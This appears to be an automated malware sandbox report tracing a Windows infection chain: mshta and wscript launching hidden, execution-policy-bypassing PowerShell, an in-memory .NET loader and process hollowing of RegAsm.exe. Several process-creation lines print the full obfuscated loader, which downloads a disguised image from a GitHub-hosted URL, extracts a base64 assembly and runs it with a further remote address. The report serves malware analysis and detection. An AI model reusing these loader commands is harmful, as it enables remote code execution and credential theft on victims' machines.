                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: wscript.exe, 00000006.00000003.2117628657.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2118544758.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119011469.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2125123731.0000000004FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119474519.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119592378.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119244676.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119359144.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2118841125.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119700909.0000000004FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maBsUhaSJBQemUf1g
                      Source: wscript.exe, 00000006.00000003.2118334105.0000000004FC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119011469.0000000004FC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2117843347.0000000004FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: maBsUhaSJBQemUf@I[
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000006.00000003.2121625089.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\$
                      Source: powershell.exe, 00000001.00000002.2137672850.0000000007AE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2140866508.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4473682945.0000000001455000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: wscript.exe, 00000006.00000003.2121451879.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2117628657.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2118544758.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119011469.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2125123731.0000000004FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119474519.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119592378.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2123014058.0000000005071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119244676.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119359144.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2118841125.0000000004FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maBsUhaSJBQemUf = "KkihOcWzULKLWxx"
                      Source: powershell.exe, 00000001.00000002.2140866508.0000000008A0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\U
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000006.00000003.2121625089.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v
                      Source: powershell.exe, 00000009.00000002.2234270142.000000000277C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node graph_11-55446
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00443355 mov eax, dword ptr fs:[00000030h] 11_2_00443355
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_10004AB4 mov eax, dword ptr fs:[00000030h] 11_2_10004AB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,11_2_00411D39
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0043503C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043BB71
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00434BD8 SetUnhandledExceptionFilter,11_2_00434BD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_10002639
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10002B1C

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara match File source: amsi32_3812.amsi.csv, type: OTHER
                      Source: Yara match File source: amsi32_4720.amsi.csv, type: OTHER
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,11_2_0041812A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F91008
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 11_2_00412132
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00419662 mouse_event,11_2_00419662
                      Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = 
                      [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jecgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigferc10wvblicagicagicagicagicagicagicagicagicagicagicattuvnykvyzgvmaw5jdglptiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbhbwzscfv0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicague1kwhzolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrnqsdwludcagicagicagicagicagicagicagicagicagicagicagyxh4c2lbu0hmleludfb0ciagicagicagicagicagicagicagicagicagicagicageehxu3kpoycgicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicaiz3vncgjizudkvyigicagicagicagicagicagicagicagicagicagicagic1oqw1lu1bhy2ugicagicagicagicagicagicagicagicagicagicagig9nenphy015tiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjec6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaundavnduwl3nlzxrozwjlc3rwcmljzxdpdghnb29ky29va2llc21llnrjriisiirfbly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyismcwwkttzvgfsvc1ztgvlucgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyi='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('tg'+'4imageurl = nllhtt'+'ps://'+'raw.githubuserco'+'ntent.com/cryptersandtoolsoficial/zip/refs/he'+'ad'+'s/main/d'+'etahnote_v.jpg nll;tg4webclient = new-object system.net.webclient;tg4imageb'+'ytes = tg4webclient.downloa'+'ddata(tg4imageurl);tg4imagetext = [system.text.encod'+'ing]::utf8.getstring(tg4imagebytes);tg4startflag = nll<<base64_start>>nl'+'l;tg4endflag = nll<<bas'+'e64_end>>nll;t'+'g4startindex = tg4imagetext.indexof(tg4startflag);tg4endindex = tg4imaget'+'ext.indexof(tg4endflag);tg4startindex'+' -g'+'e 0 -and tg4endindex -gt tg4startindex;tg4s'+'tartindex += tg4startflag.length;tg4base64length = tg4endindex - tg4startindex;tg4base64command'+' = tg4imagetext.substring('+'tg4startindex, tg4base64length);tg4commandbytes = [system.convert'+']::f'+'rombase64string(tg4base64command);tg4loadedassembl'+'y = [system.reflection.assembly]::load(tg4commandby'+'te'+'s);tg4vaimethod = [dnlib.io.home].getmethod(nllva'+'inll);tg4vai'+'method'+'.invoke(tg4null, @(nl'+'ltxt.eccfrr/054/04.022.3.291//:ptthnl'+'l, nlldesat'+'ivadon'+'ll, nlldesativadonll, nlldesativadonll, nllregasmnll, nlldesativadonll, nlldesativadonll));').replace('tg4',[string][char]36).replace(([char]78+[char]108+[char]76),[string][char]39) | . ((gv '*mdr*').name[3,11,2]-join'')"
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerpc]sP
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3S\
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.0000000001417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerK*
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerjN{
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Program Managerz*
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: |Program Manager|
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Program ManagerN*
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr -- Binary or memory string: [Program Manager]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: 11_2_00434CB6 cpuid 11_2_00434CB6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: GetLocaleInfoA,11_2_0040F90C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: EnumSystemLocalesW,11_2_0045201B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: EnumSystemLocalesW,11_2_004520B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00452143
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: GetLocaleInfoW,11_2_00452393
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: EnumSystemLocalesW,11_2_00448484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004524BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: GetLocaleInfoW,11_2_004525C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00452690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: GetLocaleInfoW,11_2_0044896D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00451D58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: EnumSystemLocalesW,11_2_00451FD0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
